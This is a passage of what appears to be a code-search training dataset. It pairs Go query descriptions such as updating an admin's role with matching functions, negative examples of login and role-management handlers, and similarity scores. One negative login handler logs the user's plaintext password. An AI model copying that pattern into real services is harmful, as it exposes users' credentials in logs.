found\"})\n\t\tc.Abort()\n\t\treturn\n\t}\n\n\tfmt.Println(result)\n\n\tif !result.IsVerified {\n\t\tc.JSON(403, gin.H{\"message\": \"Account is not verified\"})\n\t\tc.Abort()\n\t\treturn\n\t}\n\n\tif err != nil {\n\t\tc.JSON(400, gin.H{\"message\": \"Problem logging into your account\"})\n\t\tc.Abort()\n\t\treturn\n\t}\n\n\t// Get the hashed password from the saved document\n\thashedPassword := []byte(result.Password)\n\t// Get the password provided in the request.body\n\tpassword := []byte(data.Password)\n\n\terr = helpers.PasswordCompare(password, hashedPassword)\n\n\tif err != nil {\n\t\tc.JSON(403, gin.H{\"message\": \"Invalid user credentials\"})\n\t\tc.Abort()\n\t\treturn\n\t}\n\n\tjwtToken, refreshToken, err2 := services.GenerateToken(data.Email)\n\n\t// If we fail to generate token for access\n\tif err2 != nil {\n\t\tc.JSON(403, gin.H{\"message\": \"There was a problem logging you in, try again later\"})\n\t\tc.Abort()\n\t\treturn\n\t}\n\n\tc.JSON(200, gin.H{\"message\": \"Log in success\", \"token\": jwtToken, \"refresh_token\": refreshToken})\n}", "func (app *application) loginHandler(w http.ResponseWriter, r *http.Request) {\n\tvar input createAuthenticationTokenDTO\n\n\tif err := app.readJSON(w, r, &input); err != nil {\n\t\tapp.badRequestResponse(w, r, err)\n\t\treturn\n\t}\n\n\tv := validator.New()\n\tif input.validate(v); !v.Valid() {\n\t\tapp.failedValidationResponse(w, r, v.Errors)\n\t\treturn\n\t}\n\n\tuser, err := app.models.Users.GetByEmail(input.Email)\n\tif err != nil {\n\t\tswitch {\n\t\tcase errors.Is(err, data.ErrRecordNotFound):\n\t\t\tapp.invalidCredentialsResponse(w, r)\n\t\tdefault:\n\t\t\tapp.serverErrorResponse(w, r, err)\n\t\t}\n\t\treturn\n\t}\n\n\tmatches, err := user.ComparePassword(input.Password)\n\tif err != nil {\n\t\tapp.serverErrorResponse(w, r, err)\n\t\treturn\n\t}\n\tif !matches {\n\t\tapp.invalidCredentialsResponse(w, r)\n\t\treturn\n\t}\n\n\ttoken, err := app.models.Tokens.New(user.ID, 3*24*time.Hour, data.ScopeAuthentication)\n\tif err != nil {\n\t\tapp.serverErrorResponse(w, r, err)\n\t\treturn\n\t}\n\n\t// Deleting auth tokens, keeping only last 5 on the background with a goroutine.\n\tapp.background(func() {\n\t\tfmt.Println(\"trying to delete tokens\") // TODO\n\t\tif err := app.models.Tokens.KeepLastFiveAuthTokens(user.ID); err != nil {\n\t\t\tapp.logger.Error(\"Error deleting tokens\")\n\t\t}\n\t})\n\n\te := envelope{\n\t\t\"user\": user,\n\t\t\"authentication_token\": map[string]interface{}{\n\t\t\t\"token\": token.Plaintext,\n\t\t\t\"expiry\": token.Expiry,\n\t\t}}\n\tout := app.outOK(e)\n\tif err := app.writeJSON(w, http.StatusOK, out, nil); err != nil {\n\t\tapp.serverErrorResponse(w, r, err)\n\t\treturn\n\t}\n}", "func AuthForJWTToken(url, email, password string) string {\n\n\t//Encode the data\n\ttype Payload struct {\n\t\tEmail string `json:\"email,omitempty\"`\n\t\tPassword string `json:\"password,omitempty\"`\n\t}\n\n\tpayload := &Payload{\n\t\tEmail: email,\n\t\tPassword: password,\n\t}\n\n\tputBody, _ := json.Marshal(payload)\n\trequestBody := bytes.NewBuffer(putBody)\n\n\t// Create client\n\tclient := &http.Client{}\n\n\t// Create request\n\treq, err := http.NewRequest(http.MethodPost, url, requestBody)\n\tif err != nil {\n\t\tlog.Fatalln(err)\n\t}\n\n\t// Set content type\n\treq.Header.Set(\"Content-Type\", \"application/json\")\n\n\t// Fetch Request\n\tresp, err := client.Do(req)\n\tif err != nil {\n\t\tlog.Fatalln(err)\n\t}\n\tdefer resp.Body.Close()\n\n\t// Read Response Body\n\trespBody, err := ioutil.ReadAll(resp.Body)\n\tif err != nil {\n\t\tlog.Fatalln(err)\n\t}\n\n\t// Display Results\n\tdebug.Info(resp, respBody)\n\n\ttype Response struct {\n\t\tToken string `json:\"access_token\"`\n\t}\n\n\tvar jwt Response\n\terr = json.Unmarshal(respBody, &jwt)\n\tif err != nil {\n\t\tlog.Fatalln(\"Error! Check your Kitsu credentials in conf.toml\")\n\t\t//log.Fatalln(err)\n\t}\n\n\treturn jwt.Token\n}", "func ValidAdmin(organization string, w http.ResponseWriter, r *http.Request) bool {\n\ttoken, err := authsdk.NewJWTTokenFromRequest(r)\n\tif err != nil {\n\t\tfmt.Printf(\"Error getting JWT Token: %v\\n\", err)\n\t\thttp.Error(w, \"Invalid Token\", http.StatusUnauthorized) //401\n\t\treturn false\n\t}\n\tisAdmin, err := token.IsOrgAdmin(organization)\n\tif err != nil {\n\t\tfmt.Printf(\"Error checking caller is an Org Admin: %v\\n\", err) //401\n\t\thttp.Error(w, \"\", http.StatusUnauthorized)\n\t\treturn false\n\t}\n\tif !isAdmin {\n\t\t//Throwing a 403\n\t\tfmt.Printf(\"Caller isn't an Org Admin\\n\")\n\t\thttp.Error(w, \"You aren't an Org Admin\", http.StatusForbidden) //403\n\t\treturn false\n\t}\n\treturn true\n}", "func AuthEmail(email, pw string) (int64, error) {\n\n\tvar mid int64\n\tvar pwhash []byte\n\n\tif err := db.QueryRow(\n\t\t\"SELECT member_id, pwhash FROM \"+emailAuthTable+\" WHERE email=?\",\n\t\temail).Scan(&mid, &pwhash); err != nil {\n\t\tif err == sql.ErrNoRows {\n\t\t\treturn 0, ErrAuthenticationFailure\n\t\t}\n\t\treturn 0, err\n\t}\n\n\terr := bcrypt.CompareHashAndPassword(pwhash, []byte(pw))\n\tif err != nil {\n\t\treturn 0, ErrAuthenticationFailure\n\t}\n\n\treturn mid, nil\n}", "func Login() http.HandlerFunc {\n\treturn func(w http.ResponseWriter, r *http.Request) {\n\t\temail := r.FormValue(\"email\")\n\t\t// validate email\n\t\tpw := r.FormValue(\"pw\")\n\t\t// validate pass\n\n\t\tlog.Println(\"email:\", email)\n\t\tlog.Println(\"pw:\", pw)\n\t}\n}", "func Login(w http.ResponseWriter, r *http.Request) {\n\tw.Header().Add(\"content-type\", \"application/json\")\n\tvar t models.Usuario\n\tif err := json.NewDecoder(r.Body).Decode(&t); err != nil {\n\t\thttp.Error(w, \"usuario y/o contraseña invaido\"+err.Error(), 400)\n\t\treturn\n\t}\n\tif len(t.Email) == 0 {\n\t\thttp.Error(w, \"El email del usuario es requerido\", 400)\n\t}\n\tdocuemnto, existe := bd.Intentologin(t.Email, t.Password)\n\tif existe == false {\n\t\thttp.Error(w, \"Usuario y/o contraseña invalidos\", 400)\n\t}\n\tjwtKey, err := jwt.GenerateJWT(docuemnto)\n\tif err != nil {\n\t\thttp.Error(w, \"Ocurrio erro intetnado generar el token\"+err.Error(), 400)\n\t}\n\tresp := models.RespuestaLogin{\n\t\tToken: jwtKey,\n\t}\n\tw.Header().Set(\"Content-Type\", \"application/json\")\n\tw.WriteHeader(http.StatusCreated)\n\tjson.NewEncoder(w).Encode(resp)\n\t//como guardar el token en una cookie\n\t/*expirationTime := time.Now().Add(24*hour)\n\thttp.SetCookie(w,&http.Cookie{\n\t\tname:\"token\",\n\t\tvalue:jwtKey,\n\t\tExpires: expirationTime,\n\t})*/\n}", "func (a *App) Auth() negroni.HandlerFunc {\n\treturn negroni.HandlerFunc(func(w http.ResponseWriter, req *http.Request, next http.HandlerFunc) {\n\t\tdb, ok := context.Get(req, \"db\").(*mgo.Database)\n\t\tif !ok {\n\t\t\ta.R.JSON(w, http.StatusInternalServerError, &Response{Status: \"Error\", Message: \"Internal server error\"})\n\t\t\treturn\n\t\t}\n\t\tauthHeader := req.Header.Get(\"Authorization\")\n\t\tif authHeader == \"\" {\n\t\t\ta.R.JSON(w, http.StatusUnauthorized, &Response{Status: \"Error\", Message: \"Not Authorized\"})\n\t\t\treturn\n\t\t}\n\t\tdata, err := base64.StdEncoding.DecodeString(strings.Replace(authHeader, \"Basic \", \"\", 1))\n\t\tif err != nil {\n\t\t\ta.R.JSON(w, http.StatusUnauthorized, &Response{Status: \"Error\", Message: \"Not Authorized\"})\n\t\t\treturn\n\t\t}\n\t\tuser := &User{}\n\t\tparts := strings.Split(string(data), \":\")\n\t\tif len(parts) < 2 {\n\t\t\ta.R.JSON(w, http.StatusUnauthorized, &Response{Status: \"Error\", Message: \"Not Authorized\"})\n\t\t\treturn\n\t\t}\n\t\tif parts[0] == parts[1] {\n\t\t\tshaHash := sha256.New()\n\t\t\tif _, err := shaHash.Write([]byte(parts[0])); err != nil {\n\t\t\t\ta.R.JSON(w, http.StatusUnauthorized, &Response{Status: \"Error\", Message: \"Not Authorized\"})\n\t\t\t\treturn\n\t\t\t}\n\t\t\ttoken := base64.StdEncoding.EncodeToString(shaHash.Sum(nil))\n\t\t\tif err := db.C(\"users\").Find(bson.M{\n\t\t\t\t\"services.resume.loginTokens\": bson.M{\"$elemMatch\": bson.M{\"hashedToken\": token}},\n\t\t\t}).One(&user); err != nil {\n\t\t\t\ta.R.JSON(w, http.StatusUnauthorized, &Response{Status: \"Error\", Message: \"Not Authorized\"})\n\t\t\t\treturn\n\t\t\t}\n\t\t} else {\n\t\t\tin := []bson.M{bson.M{\"address\": parts[0], \"verified\": false}}\n\t\t\tif err := db.C(\"users\").Find(bson.M{\"emails\": bson.M{\"$in\": in}}).One(&user); err != nil {\n\t\t\t\ta.R.JSON(w, http.StatusUnauthorized, &Response{Status: \"Error\", Message: \"Not Authorized\"})\n\t\t\t\treturn\n\t\t\t}\n\t\t\tshaHash := sha256.New()\n\t\t\tif _, err := shaHash.Write([]byte(parts[1])); err != nil {\n\t\t\t\thttp.Error(w, \"Not Authorized\", http.StatusUnauthorized)\n\t\t\t\treturn\n\t\t\t}\n\t\t\th := hex.EncodeToString(shaHash.Sum(nil))\n\t\t\tif err := bcrypt.CompareHashAndPassword([]byte(user.Services.Password.Bcrypt), []byte(h)); err != nil {\n\t\t\t\ta.R.JSON(w, http.StatusUnauthorized, &Response{Status: \"Error\", Message: \"Not Authorized\"})\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t\tcontext.Set(req, \"user\", user)\n\t\tnext(w, req)\n\t})\n}", "func Login(c *fiber.Ctx) error {\n\n\t//Create base User model\n\tvar t models.Usuario\n\n\t//Decode the body of request\n\tif err := c.BodyParser(&t); err != nil {\n\t\treturn c.Status(400).JSON(fiber.Map{\"status\": \"error\", \"message\": \"Review your input\", \"data\": err.Error()})\n\t}\n\n\t//If the email of the body is Empty\n\tif len(t.Email) == 0 {\n\t\treturn c.Status(500).JSON(fiber.Map{\"status\": \"error\", \"message\": \"Email is required\"})\n\t}\n\n\t//Try the login in the DB\n\tdocumento, exist := db.IntentoLogin(t.Email, t.Password)\n\n\t//If user not exist\n\tif !exist {\n\t\treturn c.Status(500).JSON(fiber.Map{\"status\": \"error\", \"message\": \"User Not exits\"})\n\t}\n\n\t//Generate a JWT\n\tjwtKey, err := jwt.GenerateJWT(documento)\n\n\tif err != nil {\n\t\treturn c.Status(500).JSON(fiber.Map{\"status\": \"error\", \"message\": \"Error in generate the token\", \"data\": err.Error()})\n\t}\n\n\t//Return the JWT\n\treturn c.JSON(&fiber.Map{\n\t\t\"success\": true,\n\t\t\"Token\": jwtKey,\n\t})\n}" ]
[ "0.7065629", "0.6748006", "0.67117566", "0.64069337", "0.6336156", "0.6307874", "0.62228215", "0.6125018", "0.6107571", "0.6039019", "0.60134894", "0.598423", "0.5961705", "0.5946701", "0.5932845", "0.5899275", "0.5894682", "0.58542633", "0.5816433", "0.5813608", "0.5801796", "0.57963705", "0.57878405", "0.5756207", "0.5753546", "0.5752699", "0.5747545", "0.57390934", "0.5726883", "0.57178277", "0.57086843", "0.57076997", "0.57047313", "0.5697739", "0.5696404", "0.5681145", "0.56763786", "0.5669462", "0.5660484", "0.56601226", "0.5653984", "0.56529063", "0.56501955", "0.56264794", "0.56237954", "0.56231546", "0.56085765", "0.56085414", "0.56058884", "0.559674", "0.55911404", "0.5588373", "0.5559652", "0.5556176", "0.55499494", "0.5546452", "0.5543249", "0.5543034", "0.5541898", "0.5541327", "0.553116", "0.5522682", "0.5520503", "0.55156124", "0.5511955", "0.55040205", "0.5503942", "0.54978836", "0.549435", "0.5491427", "0.5489605", "0.547745", "0.5476135", "0.5463845", "0.5462177", "0.54573846", "0.5449547", "0.54475003", "0.54456663", "0.54341406", "0.5433712", "0.5430418", "0.54275805", "0.54251283", "0.54230684", "0.5417989", "0.5416384", "0.5413954", "0.540881", "0.54028267", "0.5398131", "0.53938913", "0.53795725", "0.53746074", "0.53657603", "0.5363877", "0.53615725", "0.5353354", "0.53422326", "0.534" ]
0.6823067
1
UpdateAdminRole updates role of an admin
func (orm *ORM) UpdateAdminRole(ctx context.Context, adminID string, role string) (bool, error) { var _Admin models.Admin err := orm.DB.DB.First(&_Admin, "id = ?", adminID).Error if errors.Is(err, gorm.ErrRecordNotFound) { return false, errors.New("AdminNotFound") } _Admin.Role = role orm.DB.DB.Save(&_Admin) return true, nil }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (bs *DefaultSecurity) UpdateAdminRoles(login string, delete bool) error {\n\tfor i, name := range bs.Admins.Roles {\n\t\tif name == login {\n\t\t\tif delete {\n\t\t\t\tbs.Admins.Roles = append(bs.Admins.Roles[:i], bs.Admins.Roles[i+1:]...)\n\t\t\t\treturn nil\n\t\t\t}\n\t\t\treturn errors.New(\"Role already exists\")\n\t\t}\n\t}\n\tbs.Admins.Roles = append(bs.Admins.Roles, login)\n\treturn nil\n}", "func (sc *ServiceController) UpdateRole(name string, body map[string]interface{}) (bool, string) {\n\turl := urlRole(sc.ID, name)\n\n\treturn sc.c.boolResponse(\"PUT\", url, body)\n}", "func (s *Server) UpdateRole(ctx context.Context, params *authorization.Role) (*authorization.Role, error) {\n\treturn &authorization.Role{}, nil\n}", "func (aaa *RolesService) AdminUpdateRoleV3(input *roles.AdminUpdateRoleV3Params) (*iamclientmodels.ModelRoleResponseV3, error) {\n\ttoken, err := aaa.TokenRepository.GetToken()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tok, badRequest, unauthorized, forbidden, notFound, internalServerError, err := aaa.Client.Roles.AdminUpdateRoleV3(input, client.BearerToken(*token.AccessToken))\n\tif badRequest != nil {\n\t\treturn nil, badRequest\n\t}\n\tif unauthorized != nil {\n\t\treturn nil, unauthorized\n\t}\n\tif forbidden != nil {\n\t\treturn nil, forbidden\n\t}\n\tif notFound != nil {\n\t\treturn nil, notFound\n\t}\n\tif internalServerError != nil {\n\t\treturn nil, internalServerError\n\t}\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn ok.GetPayload(), nil\n}", "func UpdateRole(c *gin.Context) {\n\tupdatedRole := model.Role{}\n\tc.BindJSON(&updatedRole)\n\n\terr := service.UpdateRole(updatedRole)\n\n\tif err != nil {\n\t\tfmt.Println(err.Error())\n\t\terror := service.GetGormErrorCode(err.Error())\n\n\t\tc.JSON(500, error)\n\t} else {\n\t\tc.String(200, \"ok\")\n\t}\n}", "func UpdateAdmin(w http.ResponseWriter, r *http.Request) {\n\tvar body UpdateAdminRequest\n\tif err := read.JSON(r.Body, &body); err != nil {\n\t\trender.Error(w, admin.WrapError(admin.ErrorBadRequestType, err, \"error reading request body\"))\n\t\treturn\n\t}\n\n\tif err := body.Validate(); err != nil {\n\t\trender.Error(w, err)\n\t\treturn\n\t}\n\n\tid := chi.URLParam(r, \"id\")\n\tauth := mustAuthority(r.Context())\n\tadm, err := auth.UpdateAdmin(r.Context(), id, &linkedca.Admin{Type: body.Type})\n\tif err != nil {\n\t\trender.Error(w, admin.WrapErrorISE(err, \"error updating admin %s\", id))\n\t\treturn\n\t}\n\n\trender.ProtoJSON(w, adm)\n}", "func (client *Client) UpdateRole(request *UpdateRoleRequest) (_result *UpdateRoleResponse, _err error) {\n\truntime := &util.RuntimeOptions{}\n\t_result = &UpdateRoleResponse{}\n\t_body, _err := client.UpdateRoleWithOptions(request, runtime)\n\tif _err != nil {\n\t\treturn _result, _err\n\t}\n\t_result = _body\n\treturn _result, _err\n}", "func (aaa *RolesService) AdminUpdateRoleV4(input *roles.AdminUpdateRoleV4Params) (*iamclientmodels.ModelRoleV4Response, error) {\n\ttoken, err := aaa.TokenRepository.GetToken()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tok, badRequest, unauthorized, forbidden, notFound, err := aaa.Client.Roles.AdminUpdateRoleV4(input, client.BearerToken(*token.AccessToken))\n\tif badRequest != nil {\n\t\treturn nil, badRequest\n\t}\n\tif unauthorized != nil {\n\t\treturn nil, unauthorized\n\t}\n\tif forbidden != nil {\n\t\treturn nil, forbidden\n\t}\n\tif notFound != nil {\n\t\treturn nil, notFound\n\t}\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn ok.GetPayload(), nil\n}", "func (aaa *RolesService) SetRoleAsAdmin(input *roles.SetRoleAsAdminParams) error {\n\ttoken, err := aaa.TokenRepository.GetToken()\n\tif err != nil {\n\t\treturn err\n\t}\n\t_, badRequest, unauthorized, forbidden, notFound, err := aaa.Client.Roles.SetRoleAsAdmin(input, client.BearerToken(*token.AccessToken))\n\tif badRequest != nil {\n\t\treturn badRequest\n\t}\n\tif unauthorized != nil {\n\t\treturn unauthorized\n\t}\n\tif forbidden != nil {\n\t\treturn forbidden\n\t}\n\tif notFound != nil {\n\t\treturn notFound\n\t}\n\tif err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func (aaa *RolesService) AdminUpdateAdminRoleStatusV3(input *roles.AdminUpdateAdminRoleStatusV3Params) error {\n\ttoken, err := aaa.TokenRepository.GetToken()\n\tif err != nil {\n\t\treturn err\n\t}\n\t_, badRequest, unauthorized, forbidden, notFound, internalServerError, err := aaa.Client.Roles.AdminUpdateAdminRoleStatusV3(input, client.BearerToken(*token.AccessToken))\n\tif badRequest != nil {\n\t\treturn badRequest\n\t}\n\tif unauthorized != nil {\n\t\treturn unauthorized\n\t}\n\tif forbidden != nil {\n\t\treturn forbidden\n\t}\n\tif notFound != nil {\n\t\treturn notFound\n\t}\n\tif internalServerError != nil {\n\t\treturn internalServerError\n\t}\n\tif err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func (_PermInterface *PermInterfaceTransactor) ApproveAdminRole(opts *bind.TransactOpts, _orgId string, _account common.Address) (*types.Transaction, error) {\n\treturn _PermInterface.contract.Transact(opts, \"approveAdminRole\", _orgId, _account)\n}", "func (db *MySQLDB) UpdateRole(ctx context.Context, role *Role) error {\n\tfLog := mysqlLog.WithField(\"func\", \"UpdateRole\").WithField(\"RequestID\", ctx.Value(constants.RequestID))\n\texist, err := db.IsRoleRecIDExist(ctx, role.RecID)\n\tif err != nil {\n\t\treturn err\n\t}\n\tif !exist {\n\t\treturn ErrNotFound\n\t}\n\tq := \"UPDATE HANSIP_ROLE SET ROLE_NAME=?, ROLE_DOMAIN=?, DESCRIPTION=? WHERE REC_ID=?\"\n\t_, err = db.instance.ExecContext(ctx, q,\n\t\trole.RoleName, role.RoleDomain, role.Description, role.RecID)\n\tif err != nil {\n\t\tfLog.Errorf(\"db.instance.ExecContext got %s. SQL = %s\", err.Error(), q)\n\t\treturn &ErrDBExecuteError{\n\t\t\tWrapped: err,\n\t\t\tMessage: \"Error UpdateRole\",\n\t\t\tSQL: q,\n\t\t}\n\t}\n\treturn nil\n}", "func (store *Store) UpdateRole(name string, prms *graylog.RoleUpdateParams) (*graylog.Role, error) {\n\tstore.imutex.Lock()\n\tdefer store.imutex.Unlock()\n\trole, ok := store.roles[name]\n\tif !ok {\n\t\treturn nil, fmt.Errorf(`no role with name \"%s\"`, name)\n\t}\n\tif prms.Description != nil {\n\t\trole.Description = *prms.Description\n\t}\n\trole.Permissions = prms.Permissions\n\trole.Name = prms.Name\n\tdelete(store.roles, name)\n\tstore.roles[role.Name] = role\n\treturn &role, nil\n}", "func (aaa *RolesService) UpdateRole(input *roles.UpdateRoleParams) (*iamclientmodels.ModelRoleResponse, error) {\n\ttoken, err := aaa.TokenRepository.GetToken()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tok, badRequest, unauthorized, forbidden, notFound, err := aaa.Client.Roles.UpdateRole(input, client.BearerToken(*token.AccessToken))\n\tif badRequest != nil {\n\t\treturn nil, badRequest\n\t}\n\tif unauthorized != nil {\n\t\treturn nil, unauthorized\n\t}\n\tif forbidden != nil {\n\t\treturn nil, forbidden\n\t}\n\tif notFound != nil {\n\t\treturn nil, notFound\n\t}\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn ok.GetPayload(), nil\n}", "func UpdateRole(u RoleCreated, id int) (role Role, err error) {\n\tq := `UPDATE roles \n\t\t\tSET name=$1, parent_id=$2 WHERE id=$3 RETURNING id, name, parent_id`\n\n\tdb := GetConnection()\n\n\tdefer db.Close()\n\n\terr = db.QueryRow(\n\t\tq,\n\t\tu.Name,\n\t\tu.ParentId,\n\t\tid,\n\t).Scan(\n\t\t&role.Id,\n\t\t&role.Name,\n\t\t&role.ParentId,\n\t)\n\tif err != nil {\n\t\treturn\n\t}\n\n\treturn\n}", "func (s Service) UpdateRole(ctx context.Context, docID, roleID []byte, dids []identity.DID) (*coredocumentpb.Role, error) {\n\treturn s.pendingDocSrv.UpdateRole(ctx, docID, roleID, dids)\n}", "func RoleUpdate(r *models.Role) error {\n\tif r.Name != \"\" {\n\t\t// Check if name already exists\n\t\tvar count uint\n\t\tbootstrap.Db().Where(\"name = ? AND id <> ?\", r.Name, r.ID).Find(&models.Role{}).Count(&count)\n\n\t\tif count == 0 {\n\t\t\terr := bootstrap.Db().Save(r).Error\n\t\t\tif err != nil {\n\t\t\t\treturn errors.New(err.Error())\n\t\t\t}\n\t\t} else {\n\t\t\treturn errors.New(\"role with this name already exists\")\n\t\t}\n\t} else {\n\t\treturn errors.New(\"role with empty name if forbidden\")\n\t}\n\treturn nil\n}", "func (srv *Service) UpdateUserRole(id string, role string) (*string, error) {\n\t//check if the user exists\n\tresponse, err := srv.mongoRepository.GetUserByID(id)\n\tif response == nil { //user doesn't exist\n\t\treturn nil, &pkg.Error{Err: err, Code: http.StatusNotFound, Message: \"User not found\"}\n\t}\n\n\t//call driven adapter responsible for updating a user's role inside the database\n\t_, err = srv.mongoRepository.UpdateUserRole(id, role)\n\n\tif err != nil {\n\t\t//return the error sent by the repository\n\t\treturn nil, err\n\t}\n\n\tmessage := \"User's role updated sucessfully\"\n\n\treturn &message, nil\n}", "func (_PermInterface *PermInterfaceSession) ApproveAdminRole(_orgId string, _account common.Address) (*types.Transaction, error) {\n\treturn _PermInterface.Contract.ApproveAdminRole(&_PermInterface.TransactOpts, _orgId, _account)\n}", "func (r *mutationResolver) UpdateRole(ctx context.Context, id string, input *models.UpdateRoleInput) (*user.Role, error) {\n\tpanic(\"not implemented\")\n}", "func (_PermInterface *PermInterfaceTransactorSession) ApproveAdminRole(_orgId string, _account common.Address) (*types.Transaction, error) {\n\treturn _PermInterface.Contract.ApproveAdminRole(&_PermInterface.TransactOpts, _orgId, _account)\n}", "func (client *Client) UpdateRole(name string, role *graylog.RoleUpdateParams) (\n\t*graylog.Role, *ErrorInfo, error,\n) {\n\treturn client.UpdateRoleContext(context.Background(), name, role)\n}", "func (role *Role) Update() error {\n\toptions := metav1.GetOptions{}\n\n\tupdate, err := role.client.Kubernetes.\n\t\tRbacV1().\n\t\tRoles(role.Namespace).\n\t\tGet(role.client.Ctx, role.Name, options)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"failed to update role %s in namespace %s: %w\", role.Name, role.Namespace, err)\n\t}\n\n\trole.Role = *update\n\n\treturn nil\n}", "func (aaa *RolesService) AdminUpdateRolePermissionsV3(input *roles.AdminUpdateRolePermissionsV3Params) error {\n\ttoken, err := aaa.TokenRepository.GetToken()\n\tif err != nil {\n\t\treturn err\n\t}\n\t_, badRequest, unauthorized, forbidden, notFound, internalServerError, err := aaa.Client.Roles.AdminUpdateRolePermissionsV3(input, client.BearerToken(*token.AccessToken))\n\tif badRequest != nil {\n\t\treturn badRequest\n\t}\n\tif unauthorized != nil {\n\t\treturn unauthorized\n\t}\n\tif forbidden != nil {\n\t\treturn forbidden\n\t}\n\tif notFound != nil {\n\t\treturn notFound\n\t}\n\tif internalServerError != nil {\n\t\treturn internalServerError\n\t}\n\tif err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func NewAdminRole() *Role {\n\treturn &Role{\n\t\tname: \"admin\",\n\t\tpermissionList: PermissionList{},\n\t}\n}", "func (aaa *RolesService) AdminUpdateRolePermissionsV4(input *roles.AdminUpdateRolePermissionsV4Params) (*iamclientmodels.ModelRoleV4Response, error) {\n\ttoken, err := aaa.TokenRepository.GetToken()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tok, badRequest, unauthorized, forbidden, notFound, err := aaa.Client.Roles.AdminUpdateRolePermissionsV4(input, client.BearerToken(*token.AccessToken))\n\tif badRequest != nil {\n\t\treturn nil, badRequest\n\t}\n\tif unauthorized != nil {\n\t\treturn nil, unauthorized\n\t}\n\tif forbidden != nil {\n\t\treturn nil, forbidden\n\t}\n\tif notFound != nil {\n\t\treturn nil, notFound\n\t}\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn ok.GetPayload(), nil\n}", "func (s *Shell) ChangeRole(c *cli.Context) (err error) {\n\trequest := struct {\n\t\tEmail string `json:\"email\"`\n\t\tNewRole string `json:\"newRole\"`\n\t}{\n\t\tEmail: c.String(\"email\"),\n\t\tNewRole: c.String(\"new-role\"),\n\t}\n\n\trequestData, err := json.Marshal(request)\n\tif err != nil {\n\t\treturn s.errorOut(err)\n\t}\n\n\tbuf := bytes.NewBuffer(requestData)\n\tresponse, err := s.HTTP.Patch(\"/v2/users\", buf)\n\tif err != nil {\n\t\treturn s.errorOut(err)\n\t}\n\tdefer func() {\n\t\tif cerr := response.Body.Close(); cerr != nil {\n\t\t\terr = multierr.Append(err, cerr)\n\t\t}\n\t}()\n\n\treturn s.renderAPIResponse(response, &AdminUsersPresenter{}, \"Successfully updated API user\")\n}", "func (_PermInterface *PermInterfaceTransactor) AssignAdminRole(opts *bind.TransactOpts, _orgId string, _account common.Address, _roleId string) (*types.Transaction, error) {\n\treturn _PermInterface.contract.Transact(opts, \"assignAdminRole\", _orgId, _account, _roleId)\n}", "func (cli *Service) UpdateRolePri(req *restful.Request, resp *restful.Response) {\n\n\tlanguage := util.GetActionLanguage(req)\n\townerID := util.GetOwnerID(req.Request.Header)\n\tdefErr := cli.Core.CCErr.CreateDefaultCCErrorIf(language)\n\tctx := util.GetDBContext(context.Background(), req.Request.Header)\n\tdb := cli.Instance.Clone()\n\n\tpathParams := req.PathParameters()\n\tobjID := pathParams[\"bk_obj_id\"]\n\tpropertyID := pathParams[\"bk_property_id\"]\n\tvalue, err := ioutil.ReadAll(req.Request.Body)\n\tif err != nil {\n\t\tblog.Error(\"read json data error :%v\", err)\n\t\tresp.WriteError(http.StatusBadRequest, &meta.RespError{Msg: defErr.New(common.CCErrCommHTTPReadBodyFailed, err.Error())})\n\t\treturn\n\t}\n\tvar roleJSON []string\n\terr = json.Unmarshal([]byte(value), &roleJSON)\n\tif err != nil {\n\t\tblog.Error(\"read json data error :%v\", err)\n\t\tresp.WriteError(http.StatusBadRequest, &meta.RespError{Msg: defErr.New(common.CCErrCommJSONUnmarshalFailed, err.Error())})\n\t\treturn\n\t}\n\tinput := make(map[string]interface{})\n\tcond := make(map[string]interface{})\n\tcond[common.BKOwnerIDField] = ownerID\n\tcond[common.BKObjIDField] = objID\n\tcond[common.BKPropertyIDField] = propertyID\n\tinput[common.BKPrivilegeField] = roleJSON\n\tcond = util.SetModOwner(cond, ownerID)\n\n\terr = db.Table(common.BKTableNamePrivilege).Update(ctx, cond, input)\n\tif nil != err {\n\t\tblog.Error(\"update role privilege error :%v\", err)\n\t\tresp.WriteError(http.StatusBadRequest, &meta.RespError{Msg: defErr.New(common.CCErrObjectDBOpErrno, err.Error())})\n\t\treturn\n\t}\n\n\tresp.WriteEntity(meta.Response{BaseResp: meta.SuccessBaseResp})\n}", "func (_TellorMesosphere *TellorMesosphereSession) GetRoleAdmin(role [32]byte) ([32]byte, error) {\n\treturn _TellorMesosphere.Contract.GetRoleAdmin(&_TellorMesosphere.CallOpts, role)\n}", "func (bs *DefaultSecurity) UpdateMemberRoles(login string, delete bool) error {\n\tfor i, name := range bs.Members.Roles {\n\t\tif name == login {\n\t\t\tif delete {\n\t\t\t\tbs.Members.Roles = append(bs.Members.Roles[:i], bs.Members.Roles[i+1:]...)\n\t\t\t\treturn nil\n\t\t\t}\n\t\t\treturn errors.New(\"Role already exists\")\n\t\t}\n\t}\n\tbs.Members.Roles = append(bs.Members.Roles, login)\n\treturn nil\n}", "func (_Distributor *DistributorSession) GetRoleAdmin(role [32]byte) ([32]byte, error) {\n\treturn _Distributor.Contract.GetRoleAdmin(&_Distributor.CallOpts, role)\n}", "func (sec *DatabaseSecurity) AddAdminRole(role string) error {\n\tif err := sec.db.GetSecurity(sec); err != nil {\n\t\treturn err\n\t}\n\tsec.UpdateAdminRoles(role, false)\n\tif err := sec.db.SetSecurity(sec); err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func (_AccessControl *AccessControlFilterer) FilterRoleAdminChanged(opts *bind.FilterOpts, role [][32]byte, previousAdminRole [][32]byte, newAdminRole [][32]byte) (*AccessControlRoleAdminChangedIterator, error) {\n\n\tvar roleRule []interface{}\n\tfor _, roleItem := range role {\n\t\troleRule = append(roleRule, roleItem)\n\t}\n\tvar previousAdminRoleRule []interface{}\n\tfor _, previousAdminRoleItem := range previousAdminRole {\n\t\tpreviousAdminRoleRule = append(previousAdminRoleRule, 